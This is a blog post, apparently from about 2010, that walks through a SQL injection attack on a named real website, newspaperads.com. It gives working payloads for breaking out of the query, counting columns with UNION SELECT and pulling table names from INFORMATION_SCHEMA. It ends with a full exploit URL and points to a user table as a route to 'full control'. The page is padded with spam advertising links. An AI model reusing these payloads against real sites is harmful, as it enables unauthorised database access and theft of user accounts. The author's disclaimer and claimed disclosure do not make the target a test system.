WEB Log   Comments   Archive   Sources   Contact me   About   RSS  

Archive 2008

Archive 2009

Archive 2010
  January
  February
  March
  April
  May
  June
  July
  August
  September

  
   Talking
  Development
  Funny
  Jokes
  Network
  Security
  Software
  Source code
  Talking
  Video
  WEB
  WEB Development
  Windows
  Windows Resources




Easy pay day loans . Telescopes and binoculars Opticsale.com .

SQL Ingection on www.newspaperads.com

Today we shall consider popular mistake SQL Injection by the example of a site www.newspaperads.com. It has interested me for the following reasons:

• Large;
• This site belong well-known USA Today;
• The site uses technology ASP+MS SQL Server.

Let's send USA Today in Yesterday. We shall consider following URL:

http://www.newspaperads.com/usatoday/results.asp?subcatid=1600&interfaceid=82& parent=Categories&subcatname=Travel+Specials

Here you can a find page devoted to travel. The page is made out as the table of three columns Advertiser, Summary, Date. Some parameters change page content. The parameter subcatid contains a mistake. We shall try to add in the end of parameter single quotes. In result there was a mistake of SQL query.

Investigate the mistake. To inject a SQL code it is necessary to add two closed parentheses in the end of the parameter and the comment to remove all other conditions used in the query. Lets inject the following value in the parameter subcatid:

1600)) and 1=0 --

I have put a condition 1=0 and the result was empty. Articles about travel are not necessary for me, I need contents of the server database. Now we select amount of fields which are returned with the SQL query. For this purpose in the query we inject UNION SELECT NULL, ? consistently increasing amount of NULL fields. At me 11 fields have turned out. At such amount NULL fields the mistake of query has disappeared and the empty table has appeared. Now, it is necessary to find out, what fields and where get on the form. For this purpose in the injected query we specify numbers, unique for each field. For example, the following query chooses in each field number from 0 up to 11:

1600)) and 1=0 union all select 1,2,3,4,5,6,7,8,9,10,11--

Number 7 has appeared in the column Summary. We shall use the seventh field to look through the system data, and we interested in the first of all names of tables which are used in a database. They can be received from table INFORMATION_SCHEMA.TABLES. We inject the following code in the parameter subcatid:

1600)) and 1=0 union all select 1,2,3,4,5,6, TABLE_NAME, 8,9,0,11 from INFORMATION_SCHEMA.TABLES--

Wee see the list of tables of a database. The most interesting, that is shown only the first 20 lines, but in the bottom of the page there is navigation on pages 1, 2, 3 ?. Navigation very good because it works even by our injected query. So we don't have to limit a conclusion of the data with the help of the SQL Injection.

Look at the table PortalUser on the third page of result. The table contents users of the portal. You can receive above them the full control!

Full URL with error:

http://www.newspaperads.com/usatoday/results.asp?subcatid=1600))%20and%201=0%20union%20all%20select%201,2,3,4,5,6,%20TABLE_NAME, %208,9,0,11%20from%20INFORMATION_SCHEMA.TABLES--&interfaceid=82&parent=Categories&subcatname=Travel+Specials

I'm not a hacker and use this article to show you a real SQL Injection error. I have been written an e-mail to the newspaperads.com administrator and I hope he will correct the WEB site

---

Low cost auto insurance quotes

dating site ashleymadison agency . Matrimoniale . Slots online! Various paylines for you.